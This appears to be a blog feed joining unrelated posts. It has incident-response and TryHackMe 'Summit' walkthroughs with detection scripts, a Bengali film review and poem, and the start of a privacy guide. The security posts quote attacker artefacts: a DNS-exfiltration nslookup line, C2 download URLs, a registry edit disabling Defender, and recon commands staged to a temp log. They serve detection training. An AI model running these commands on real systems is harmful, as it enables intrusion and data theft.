Alerts with IDs 1005, 1020, 1023 and 1026-1034 are related to this one: they are the spearphishing email, the creation of the malicious attachment, or further Suspicious Parent-Child Relationship alerts for lookups of other subdomains. They get the same verdict, but explain the link thoroughly in each report (the LLM will most likely still grade it low, which is down to its logic rather than a mistake on our side).
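The following is an added example, not code from the original writeup or from the room, that applies the reasoning above to Sysmon-style process-creation records: it picks out nslookup.exe invocations whose leftmost label is long and high-entropy, and then tries to decode that label as base64 to see what is leaving. The sample records are constructed; the first command line is the one alert 1025 displayed, the other three are invented benign lookups for contrast. Run on the real alert, the label UEsDBBQAAAAIANigLlfVU3cDIgAAAI decodes to bytes beginning PK\x03\x04, the ZIP local-file-header signature, so what is being tunnelled out starts with a ZIP archive. The length and entropy thresholds are my assumptions.

```python
import base64
import binascii
import math
import re
from collections import Counter

# Constructed sample records in the shape of Sysmon Event ID 1 (not pulled from the
# room's Splunk). The first command line is the one alert 1025 displayed; the
# remaining records are invented benign activity for contrast.
EVENTS = [
    {"host": "win-3450", "parent": "powershell.exe", "process": "nslookup.exe",
     "cmd": r'"C:\Windows\system32\nslookup.exe" UEsDBBQAAAAIANigLlfVU3cDIgAAAI.haz4rdw4re.io'},
    {"host": "win-3450", "parent": "powershell.exe", "process": "nslookup.exe",
     "cmd": r'"C:\Windows\system32\nslookup.exe" dc01.tryhatme.com'},
    {"host": "win-3451", "parent": "cmd.exe", "process": "nslookup.exe",
     "cmd": r'"C:\Windows\system32\nslookup.exe" -type=mx tryhatme.com'},
    {"host": "win-3452", "parent": "explorer.exe", "process": "chrome.exe",
     "cmd": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
]

# Parents that indicate a scripted rather than interactive lookup.
SCRIPT_PARENTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# File signatures worth recognising in a decoded chunk.
MAGIC = {b"PK\x03\x04": "zip", b"MZ": "pe", b"%PDF": "pdf", b"\x1f\x8b": "gzip"}
# Standard or URL-safe base64 alphabet; '=' padding cannot appear in a DNS label.
B64_LABEL = re.compile(r"^[A-Za-z0-9+/_-]+$")


def queried_name(cmd):
    """Return the name nslookup was asked to resolve: the last non-option argument."""
    args = re.sub(r'^"[^"]*"\s*', "", cmd).split()       # drop the quoted executable path
    names = [a for a in args if not a.startswith("-")]
    return names[-1] if names else ""


def shannon_entropy(s):
    """Bits of entropy per character; encoded data sits well above ordinary hostnames."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def decode_label(label):
    """Decode a DNS label as base64 and return (raw bytes, recognised file type or None)."""
    text = label.replace("-", "+").replace("_", "/")
    text += "=" * (-len(text) % 4)                      # restore the padding DNS cannot carry
    try:
        raw = base64.b64decode(text)
    except (binascii.Error, ValueError):
        return None, None
    kind = next((k for magic, k in MAGIC.items() if raw.startswith(magic)), None)
    return raw, kind


def score_event(ev, min_len=20, min_entropy=3.0):
    """Return a finding for an nslookup of <encoded-label>.<zone>, or None."""
    if ev["process"].lower() != "nslookup.exe":
        return None
    labels = queried_name(ev["cmd"]).split(".")
    if len(labels) < 3:
        return None                                      # nothing in front of the zone
    left = labels[0]
    if len(left) < min_len or not B64_LABEL.match(left) or shannon_entropy(left) < min_entropy:
        return None
    raw, kind = decode_label(left)
    return {
        "host": ev["host"],
        "zone": ".".join(labels[-2:]),
        "label_len": len(left),
        "entropy": round(shannon_entropy(left), 2),
        "scripted_parent": ev["parent"].lower() in SCRIPT_PARENTS,
        "decoded_type": kind,
        "decoded_prefix": raw[:6] if raw else None,
    }


def analyze(events):
    """Run score_event over a batch of records and keep the hits."""
    return [f for f in (score_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

The same logic works on the other alerts in the 1026-1034 range, which only differ in the label. One caveat when applying it elsewhere: DNS names are case-insensitive and some resolvers randomise label case, so real tooling more often uses base32 or hex; if the base64 decode yields no recognisable header, try those alphabets before concluding the label is random.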

Alert 4: Network drive mapped to a local drive (ID 1022) – Medium severity

Description:
A network drive was mapped to a local drive. Normally, this is not a cause for concern, but investigate further to determine if it is malicious.

timestamp:
01/26/2026 21:43:57.473

host.name:
win-3450

process.name:
net.exe

process.pid:
5784

process.parent.pid
3728

process.parent.name:
powershell.exe

process.command_line:
"C:\Windows\system32\net.exe" use Z: \\FILESRV-01\SSF-FinancialRecords

process.working_directory:
C:\Users\michael.ascot\downloads\

event.action:
Process Create (rule: ProcessCreate)

As the SIEM description says, this normally wouldn't be cause for concern, but it happened on hostname win-3450, which had just fallen victim to the phishing attack above, and the parent is powershell.exe with PID 3728, the same parent that spawned the nslookup in Alert 1025. The timestamp is key to placing it in that chain.

At 01/26/2026 21:43:57.47, net.exe running under that PowerShell mapped the \\FILESRV-01\SSF-FinancialRecords share to drive Z: on Michael Ascot's machine; the drive was disconnected at 01/26/2026 21:44:42.473. On its own, a mapped drive is unremarkable. Looking at the Splunk logs around this event, however, at 01/26/2026 21:44:31.473 a process with the same process ID as one belonging to the malware from Alert ID 1025 (True Positive requiring escalation) copied the share's contents into C:\Users\michael.ascot\downloads\exfiltration (the /E after the path in the logged command line is most likely a recursive-copy switch, not part of the directory name), the directory used to stage files for exfiltration. In other words, the malware mounted the finance share and copied it into the staging directory (Data from Network Shared Drive, T1039), which the DNS lookups then carried out of the network; the shared parent PID suggests the mapping was scripted by the malware rather than done by hand.

Recommended Remediation Actions: as for Alert ID 1025, user awareness training, plus DLP and IPS controls. Also review who can reach the SSF-FinancialRecords share, since its contents were staged for exfiltration.

Alert ID 1024 (Network drive disconnected from a local drive) is the other half of this alert, the disconnection of the same drive, and therefore gets the same verdict.

And with this one, the room is finished. Out of 36 alerts, 17 were True Positives, most of them generated by processes spawned as a result of earlier alerts. We saw the importance of user awareness training, as all of this could have been avoided had the user in Alert 1025 not opened the attachment, and of log monitoring: a single email cluttered the SIEM with alerts and turned into a serious incident. Stay vigilant and keep monitoring the network, because an attack can come in many forms, at any time, with catastrophic consequences.

 

from লোকমানুষ এর ব্লগ

Some films we watch for the story, some for the actor. Rental Family (2025) falls into the second group for me, but by the time I stood up at the end I realised it is not just one actor's comeback; it is a deep lesson on human need, emptiness and feeling.

Brendan Fraser: to me that name means the thrill of the age when you have just left adolescence and are heading into youth. In The Mummy and Journey to the Center of the Earth his presence was lively, confident, full of light. Seeing his face on a poster after so long made those old memories sparkle, and that pull is what sat me down to watch Rental Family. But this Brendan Fraser was an altogether different person: quiet, broken, exhausted.

Watching the character Philip, I kept feeling he was a shadow of Brendan Fraser's real life. Someone who once stood at the peak of popularity in the acting world, whose name people have now almost forgotten. Out of necessity, to survive, he acts, but not on any stage; in the empty places of people's lives. A rented father for a child without one, a hired husband so a woman can appear complete in front of her family: this is acting in another form, with no camera but with real feeling.

The thought that cut deepest while watching was how many strange ways people find to fill other people's needs. Every gap in society is eventually filled by someone: for a living, to survive, or out of loneliness. Rental Family slowly opens the door to that odd yet real world where love can be rented and family is temporary, but the feelings, however short-lived, are not false.

Philip's most human moment comes when he turns down the role in a detective film that he had worked so hard to get. Faced with the condition that he must leave this city and this country, he thinks of the little girl whose father he has been playing, a role he has become emotionally entangled in.

No real relationship, no blood tie, yet he had promised the girl he would not leave her again. The scene says, quietly, that a promise made out of feeling can sometimes outweigh a life's ambition.

Another character that moved me deeply is Kikuo Hasegawa: a once-famous actor, now an old man with dementia. His one wish is to see once more the house of his childhood, the memories of his youth, the village home where he lived with his family, those days. But that longing is walled in by age and illness.

Ignoring his daughter's objections, he slips out with Philip as his companion. The journey is not just a trip; it is a man at the end of his life trying to touch what is left of his own existence.

And Shinji Tada is perhaps the starkest reflection of reality. For his own peace of mind he rents a wife and a child. He hides the emptiness inside him behind a lie, because the family he imagines does not exist. Yet even within that false relationship, his struggle to keep going is painfully real.

Rental Family is not a loud film. There are no dramatic speeches, no big twists. But every scene quietly asks: are we really alone? Or do our feelings become real somewhere between need and pretence?

When the film ended I felt this story is not only on the screen; it is all around us. Rented relationships, performed feelings, and the unexpected human bonds that grow inside them: together they make Rental Family a film that sends you out wanting to look at people and at life afresh.

If you like quiet, humane films that give you something to think about, this one can go on your watch list.


from লোকমানুষ এর ব্লগ

There are words, but no voice.

This picture is the silent autobiography of our politics.
Here the leader speaks and the crowd is enchanted.
The words light lamps, draw maps of aspiration.
On stage, promises of change draw applause.

But step down from the stage and the scene changes.
Try to walk toward the dream and the system glares.
Ask a question and a hand reaches for your throat.
Once the voice is choked, truth and dream both run out of breath.

The big face of power overwhelms the small one;
in exchange for applause it parades the shadow of a dream.
Words of reassurance are open to every microphone,
while people very carefully hide their sighs.

Our politics loves words but cannot bear voices.
Here speeches are safe and reality is dangerous.
Yet history says: even a strangled throat one day learns to scream...

Image courtesy: Eiko Ojala

 

from plutogazer writeups

This is a walkthrough for the Summit incident response challenge room on TryHackMe. The writeup is meant to offer short and concise solutions, with an extended explanation after each answer for those interested in learning more about the solution to a specific task.

Introduction

The description of the room is the following:

Can you chase a simulated adversary up the Pyramid of Pain until they finally back down?

The room is essentially a threat detection and response simulator: we defend against increasingly harder-to-detect threats by working up the levels of the Pyramid of Pain (hash values, IP addresses, domain names, network/host artifacts, tools, and TTPs, from least to most painful for the attacker to change). We receive .exe files by email and run them through a built-in sandbox analysis tool.

The first email we get is one containing a file named sample1.exe

Task 1: What is the first flag you receive after successfully detecting sample1.exe?

  1. Read the email and click on the attachment to download.
  2. Go to the burger menu on the top left, then click on the Malware Sandbox tool. Choose sample1.exe

After a while we get the results: an information table and a Behaviour Analysis section. For this task, we focus on the table:

File Name: sample1.exe
File Size: 202.50 KB
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Analysis Date: September 5, 2023
OS: Windows 10 x64 v1803
Tags: Trojan.Metasploit.A
MIME: application/x-dosexec
MD5: cbda8ae000aa9cbe7c8b982bae006c2a
SHA1: 83d2791ca93e58688598485aa62597c0ebbf7610
SHA256: 9c550591a25c6228cb7d74d970d133d75c961ffed2ef7180144859cc09efca8c

Following the Pyramid of Pain, the first level is “Hash value.”

  1. Go to the burger menu, then click on Manage Hashes.
  2. There are three options: MD5, SHA1, SHA256. Pick any one and input the corresponding hash.

We will get a message congratulating us on completing the task, and a new email containing flag 1 and the next malware sample. (Where a tool gives the choice, prefer SHA256: MD5 and SHA1 are collision-prone, though for blocking one known sample any of the three does the job.)

Task 2: What is the second flag you receive after successfully detecting sample2.exe?

  1. Read the new email and click on the sample2.exe attachment.
  2. Analyze the file on the Malware Sandbox tool.

But changing a single bit changes the hash value of a file completely, so this control is trivial to evade. The second level of the Pyramid of Pain is IP Addresses. The analysis again gives us an information table and a Behaviour Analysis section, and now a Network Activity section, which is the one we check now.

The results are as follows (Information Table and Behaviour Analysis sections omitted):

Network Activity

HTTP(S) requests: 1
TCP/UDP connections: 3
DNS requests: 0
Threats: 0

HTTP requests

PID Process Method IP URL
1927 sample2.exe GET 154.35.10.113:4444 http://154.35.10.113:4444/uvLk8YI32

Connections

PID Process IP Domain ASN
1927 sample2.exe 154.35.10.113:4444 - Intrabuzz Hosting Limited
1927 sample2.exe 40.97.128.3:443 - Microsoft Corporation
1927 sample2.exe 40.97.128.4:443 - Microsoft Corporation

The HTTP request shows the executable connecting to, and downloading a file from, 154.35.10.113. We now have to create a firewall rule for this IP address.

  1. Go to the Burger Menu, then click on the Firewall Manager tool. Fill the fields as follows:
    • Type: Egress
    • Source IP: Any
    • Destination IP: 154.35.10.113
    • Action: Deny

We will receive a congratulating message and a new email with flag 2.

Extra: Why not the other two IPs

According to the analysis, the file also connects to two other addresses, 40.97.128.3 and 40.97.128.4. Those belong to Microsoft, whereas the one we blocked belongs to a hosting provider. Connecting to a Microsoft address is routine for business operations; connecting to, and downloading a file from, a hosting provider's address on port 4444 (Metasploit's default listener port) is not. Blocking the Microsoft addresses would break legitimate traffic and still leave the attacker's server reachable.

Task 3: What is the third flag you receive after successfully detecting sample3.exe?

Changing an IP address is not particularly hard: the attacker says in their email that they hired a new cloud service provider and now have access to many more IPs. The third level of the Pyramid of Pain is Domain Names.

  1. Read the new email and analyze the sample3.exe file.

Under Network Activity we will have a new section, DNS requests.

(output omitted)

Network Activity

HTTP(S) requests: 2
TCP/UDP connections: 4
DNS requests: 2
Threats: 0

HTTP requests

PID Process Method IP URL
1021 sample3.exe GET 62.123.140.9:1337 http://emudyn.bresonicz.info:1337/kzn293la
1021 sample3.exe GET 62.123.140.9:80 http://emudyn.bresonicz.info/backdoor.exe

Connections

PID Process IP Domain ASN
1021 sample3.exe 40.97.128.4:443 services.microsoft.com Microsoft Corporation
1021 sample3.exe 62.123.140.9:1337 emudyn.bresonicz.info XplorIta Cloud Services
1021 sample3.exe 62.123.140.9:80 emudyn.bresonicz.info XplorIta Cloud Services
2712 backdoor.exe 62.123.140.9:80 emudyn.bresonicz.info XplorIta Cloud Services

DNS requests

Domain IP
services.microsoft.com 40.97.128.4
emudyn.bresonicz.info 62.123.140.9

The DNS requests section shows the domain the executable downloads files from: emudyn.bresonicz.info. The other one, services.microsoft.com, belongs to Microsoft, so we can assume it is safe.

  1. Head to the Burger menu, and then click on DNS Rule Manager.
  2. Click on Create DNS Rule
  3. We have to fill some fields. Do so as follows:
    • Rule name: (Any works. I named it “Deny Phishing Domain.”)
    • Category: Phishing
    • Domain Name: emudyn.bresonicz.info
    • Action: Deny

We will receive a congratulating message and a new email with flag 3.

Task 4: What is the fourth flag you receive after successfully detecting sample4.exe?

Changing a domain is harder than changing an IP address, as it means buying a new domain and updating DNS records. Still, a determined attacker may well do so (and some registrars have loose standards). The next level of the Pyramid of Pain is Host and Network Artifacts.

  1. Read the email and analyze sample4.exe.

The analysis now has a Registry Activity section after the previous ones. Let's take a look at it.

(output omitted)

Registry Activity

Total events: 3
Read events: 1
Write events: 2
Delete events: 0

Modification events

(PID) Process: (3806) sample4.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
Operation: write | Name: DisableRealtimeMonitoring | Value: 1

(PID) Process: (1928) explorer.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Operation: write | Name: EnableBalloonTips | Value: 1

(PID) Process: (9876) notepad.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt
Operation: read | Name: Progid | Value: txtfile

Looking at the first event, sample4.exe disables Windows Defender real-time protection by writing DisableRealtimeMonitoring = 1 under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection (Impair Defenses: Disable or Modify Tools, T1562.001). This is the artifact: finding it is how we know we have a potentially infected host. The other two events are ordinary explorer.exe and notepad.exe activity. We now have to create a rule that alerts us when this happens.

  1. Go to the Burger Menu, then click on Sigma Rule Builder.
  2. Click on Create Sigma Rule. A Sigma rule will be generated by an LLM based on the options we pick.
  3. On the “I want to create a rule that focuses on:” section, pick Sysmon Event Logs.
  4. On “I want to target this Sysmon event:”, pick Registry Modifications.
  5. You have to fill some fields to generate the rule. Fill them as follows:
    • Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
    • Registry Name: DisableRealtimeMonitoring
    • Value: 1
    • ATT&CK ID: Defense Evasion (TA0005)
  6. Click on the Validate Rule button.

Once it generates the Sigma rule, we will receive a congratulating message and a new email with flag 4.

Extra: why “alert” and not “respond”.

The reason we create a rule that alerts rather than responds, unlike the previous steps, is that disabling real-time protection, while unusual (and warned against on modern Windows), can be a benign administrative action. We alert the security team when it occurs so they can investigate and decide whether it was expected, rather than blocking it outright and potentially interfering with normal business operations.

Task 5: What is the fifth flag you receive after successfully detecting sample5.exe?

Knowing the artifacts an attacker leaves on a system means they have to change their tools and methodology, which costs them even more to keep attacking us. We are now at the highest levels of the pyramid, the hardest for an attacker to bypass, and at this point it is likely they would move on to another target. Still, if they persist, the second-to-last level of the Pyramid of Pain is Tools.

  1. Read the new email and click on sample5.exe.

According to the email, the “heavy lifting” and instructions now happen on their backend server, which means we get significantly less information about the file's actions.

This time we don't get the results of an analysis, but a log of attempted connections:

2023-08-15 09:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 09:23:45 | Source: 10.10.15.12 | Destination: 43.10.65.115 | Port: 443 | Size: 21541 bytes
2023-08-15 09:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 10:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 10:14:21 | Source: 10.10.15.12 | Destination: 87.32.56.124 | Port: 80 | Size: 1204 bytes
2023-08-15 10:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 11:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 11:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 11:45:09 | Source: 10.10.15.12 | Destination: 145.78.90.33 | Port: 443 | Size: 805 bytes
2023-08-15 12:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 12:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 13:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 13:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 13:32:17 | Source: 10.10.15.12 | Destination: 72.15.61.98 | Port: 443 | Size: 26084 bytes
2023-08-15 14:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 14:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 14:55:33 | Source: 10.10.15.12 | Destination: 208.45.72.16 | Port: 443 | Size: 45091 bytes
2023-08-15 15:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 15:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 15:40:10 | Source: 10.10.15.12 | Destination: 101.55.20.79 | Port: 443 | Size: 95021 bytes
2023-08-15 16:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 16:18:55 | Source: 10.10.15.12 | Destination: 194.92.18.10 | Port: 80 | Size: 8004 bytes
2023-08-15 16:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 17:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 17:09:30 | Source: 10.10.15.12 | Destination: 77.23.66.214 | Port: 443 | Size: 9584 bytes
2023-08-15 17:27:42 | Source: 10.10.15.12 | Destination: 156.29.88.77 | Port: 443 | Size: 10293 bytes
2023-08-15 17:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 18:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 18:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 19:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 19:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 20:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 20:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 21:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes

I confess the first thing I noticed was the length of a lot of the attempts: most of them were over 10 KB. Then I realized what the actual problem with this log was: most of them go to the same destination, with the exact same byte length.

The attacker's tool is beaconing: a 97-byte message to 51.102.10.19 on port 443 every 30 minutes, with the larger transfers to other addresses in between. Let's create a Sigma rule to detect this.

  1. Go to Create Sigma Rule, then click on Sysmon Event Logs.
  2. On “I want to target this Sysmon event:”, pick Network Connections.
  3. Fill the requested fields as follows:
    • Remote IP: Any
    • Remote Port: Any
    • Size (bytes): 97
    • Frequency (seconds): 1800
    • ATT&CK ID: Command and Control (TA0011)

Once it generates the Sigma rule, we will receive a congratulating message and a new email with flag 5.

Extra: why this rule

As in the previous task, we alert rather than block, because legitimate traffic may match these criteria. We set Remote IP and Remote Port to “Any” because we know the attacker can change their IP address, but this also means the rule can fire at any point. SOC analysts would, however, notice the same-sized messages going to the same address every 30 minutes without fail, and respond. Small, regular check-ins like this are a common Defense Evasion pattern: they blend in better than a single bulk transfer of everything meant to be exfiltrated, and they are less likely to trip size-based Data Loss Prevention thresholds.
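To show what the rule is keyed on, here is an added example, not code from the original post or the room, that parses an excerpt of the log above, groups flows by source, destination, port and size, and flags groups whose inter-arrival times are nearly constant. The 97-byte flows come out as one beacon with a period of 1800 seconds, which is exactly the Size and Frequency the rule builder asked for; everything else is returned as candidate bulk transfers, largest first. The thresholds (at least four occurrences, at most 10% relative jitter) are my assumptions; real implants usually add jitter to their sleep, which is why the check is relative rather than an exact match on 1800.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Excerpt of the connection log attached to the sample5.exe email (the room's own
# lines, trimmed to the first four hours); nothing in it is invented.
LOG = """\
2023-08-15 09:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 09:23:45 | Source: 10.10.15.12 | Destination: 43.10.65.115 | Port: 443 | Size: 21541 bytes
2023-08-15 09:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 10:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 10:14:21 | Source: 10.10.15.12 | Destination: 87.32.56.124 | Port: 80 | Size: 1204 bytes
2023-08-15 10:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 11:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 11:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 11:45:09 | Source: 10.10.15.12 | Destination: 145.78.90.33 | Port: 443 | Size: 805 bytes
2023-08-15 12:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 12:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 13:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
"""

LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \| Source: (?P<src>[\d.]+) \| "
    r"Destination: (?P<dst>[\d.]+) \| Port: (?P<port>\d+) \| Size: (?P<size>\d+) bytes$"
)


def parse(log):
    """Turn the pipe-separated records into dicts; lines that do not match are skipped."""
    rows = []
    for line in log.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        rows.append({"ts": datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S"),
                     "src": d["src"], "dst": d["dst"],
                     "port": int(d["port"]), "size": int(d["size"])})
    return rows


def find_beacons(rows, min_count=4, max_jitter=0.1):
    """Group flows by (src, dst, port, size) and report the groups whose inter-arrival
    times are nearly constant: relative standard deviation <= max_jitter."""
    groups = defaultdict(list)
    for r in rows:
        groups[(r["src"], r["dst"], r["port"], r["size"])].append(r["ts"])
    beacons = []
    for (src, dst, port, size), times in groups.items():
        if len(times) < max(min_count, 2):
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = mean(gaps)
        if period <= 0:
            continue                                   # duplicate timestamps, not a beacon
        jitter = pstdev(gaps) / period
        if jitter <= max_jitter:
            beacons.append({"src": src, "dst": dst, "port": port, "size": size,
                            "count": len(times), "period_s": round(period),
                            "jitter": round(jitter, 3)})
    return beacons


def bulk_transfers(rows, beacons):
    """Everything that is not part of a beacon, largest first: the candidate payload flows."""
    keys = {(b["src"], b["dst"], b["port"], b["size"]) for b in beacons}
    rest = [r for r in rows if (r["src"], r["dst"], r["port"], r["size"]) not in keys]
    return sorted(rest, key=lambda r: r["size"], reverse=True)


if __name__ == "__main__":
    rows = parse(LOG)
    beacons = find_beacons(rows)
    for b in beacons:
        print(f"beacon: {b['src']} -> {b['dst']}:{b['port']} {b['size']} B every {b['period_s']} s, x{b['count']}")
    for r in bulk_transfers(rows, beacons):
        print(f"bulk:   {r['ts']} -> {r['dst']}:{r['port']} {r['size']} B")
```

Run over the full log the same grouping gives one beacon of 25 check-ins; the bulk list is where an analyst would start looking for what was actually taken.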

Task 6: What is the final flag you receive from Sphinx?

A top-tier attacker might have enough money and time to change, build and learn new tools and methodologies. We are at the last level of the Pyramid of Pain, the attacker's Tactics, Techniques and Procedures. If we can detect and respond to how an attacker operates, they have almost no room left to fight back.

  1. Read the final email and open the attachment.

This time the attachment is a log of the commands the sample files run once opened:

dir c:\ >> %temp%\exfiltr8.log
dir “c:\Documents and Settings” >> %temp%\exfiltr8.log
dir “c:\Program Files\” >> %temp%\exfiltr8.log
dir d:\ >> %temp%\exfiltr8.log
net localgroup administrator >> %temp%\exfiltr8.log
ver >> %temp%\exfiltr8.log
systeminfo >> %temp%\exfiltr8.log
ipconfig /all >> %temp%\exfiltr8.log
netstat -ano >> %temp%\exfiltr8.log
net start >> %temp%\exfiltr8.log

This shows the samples running commands that collect important system information (directory listings, the local administrators group, OS version, system info, network configuration, open connections, running services) and redirecting the output into a file named exfiltr8.log in the temp folder, a common place to stage data and hide malware since every user can write there. Let's generate a rule to detect the creation of that file.

  1. Go to Create Sigma Rule, then click on Sysmon Event Logs.
  2. On “I want to target this Sysmon event:”, pick File Creation and Modification.
  3. Fill the requested fields as follows:
    • File Path: %temp%
    • File Name: exfiltr8.log
    • ATT&CK ID: Collection (TA0009)

Once it generates the Sigma rule, we will receive a congratulating message and a new email with the final flag.

Congratulations! The room is finished.

What I Learnt

  • Pyramid of Pain: this challenge allowed me to strengthen my knowledge on the framework, forcing me to think why each level has its corresponding difficulty, by thinking how an attacker could bypass a detection or deny rule.
  • Sigma rule structure: levels 3 to 5 involved generating a Sigma rule, which the SOC L1 learning path (this challenge was part of it) has no room on at this point.
  • Analyzing logs: task 5 was about to look for a specific pattern in a log file. Even if at first I focused on the wrong pattern, I managed to realize quite quickly what was I supposed to be looking for.
  • Learning how an attacker might hide their actions, and thinking of False Positives: some tasks involved the attacker hiding their signatures, or hiding their actions by modifying system files. For these I had to consider about False Positives as well, as some of their actions could be similar to normally benign actions, and creating an overly lax detection rule might make the SOC team focus on the wrong alert.
 

from River

This guide will cover various recommendations for Windows/Linux/iOS with an eye toward free, open-source, private software and privacy-enhancing tips. Given how much I'll be covering, it will not go into maximum depth (i.e., I do not always offer every possible option or my full reasoning for a recommendation). Please refer to my PC Privacy Guide, iOS Privacy Guide, and De-Googling Guide back on my old Substack for more focused guides.

And yes, non-corporate Linux and Graphene are vastly preferable to Windows and iOS. Your privacy on Windows and iOS is inherently compromised. You can, however, reduce data collection in some marginal ways, and you certainly can improve the external privacy of your system (i.e., reduce how much web trackers monitor you and so on). Frankly, I do not yet have enough experience with either to cover them in detail, nor do I think that installing a new OS is a privacy tip most people will just up and follow. This article is aimed at people who may not be willing to go that far yet. I do have some brief comments on OS options later on.

I'll hopefully be putting out a follow-up post to this fairly soon, so stay posted for that. It'll be more FOSS and recommendations of cool tools rather than what I consider to be essential privacy steps.

Additional Resources

  • Privacy Tests – A website which compares open-source tests of browser privacy. It is one of the easiest ways to quickly compare the major browsers.

  • Avoid the Hack’s Browser Comparison Tool – Similar to Privacy Tests, but more generalized and with information on more browsers.

  • Privacy Guides and Avoid the Hack – Websites managed by people familiar with the privacy world, and so tend to have much better recommendations than similar sites. You can find recommended browsers, operating systems, email providers, etc.

  • EFF’s Cover Your Tracks – A tool that attempts to fingerprint your browser in order to determine how protected you are. Extremely helpful for testing whether features are truly improving your privacy.

  • O&O Software – Makers of a number of tools that can make Windows more secure/private. Many of the tools are paid, but AppBuster and ShutUp10++ are both free, and I highly recommend ShutUp10++ in particular for disabling Windows bloat/spyware.

De-Googling

While you may still need a Google account for certain things, you certainly can adjust settings to improve privacy and migrate most services away from Google.

For tweaks, most of the settings you'll want will be under Data & Privacy in Google Account. You'll ideally want to disable everything under Things you’ve done and places you’ve been. You'll also want to limit the amount of info shared under Info you can share with others and cut down on the number of third-party services under Data from apps and services you use.

Beyond the general tweaks, I'd highly recommend disabling all “personalization” and “smart” features, as nowadays that is often cover for AI-powered data harvesting. You can find a number of these features under general Gmail settings.

As for migration, Google's Dashboard, Takeout, and Delete Services will be your friends. Dashboard shows a general overview of your data and services, Takeout allows you to export your data, and Delete Services, of course, allows you to delete things.

Recommendations

  • Google Search –> Startpage, DuckDuckGo, or SearXNG. Startpage is a simple Google and Bing wrapper, so should work well for most users. DDG has been implementing AI features I'm really not a fan of, but it does have some very handy features, an onion service, and a version of the engine without AI, so DDG NoAI is my personal choice. SearXNG is the most versatile of the 3, even including search functions for torrents and other specifics, but service can be a bit spotty in my experience.

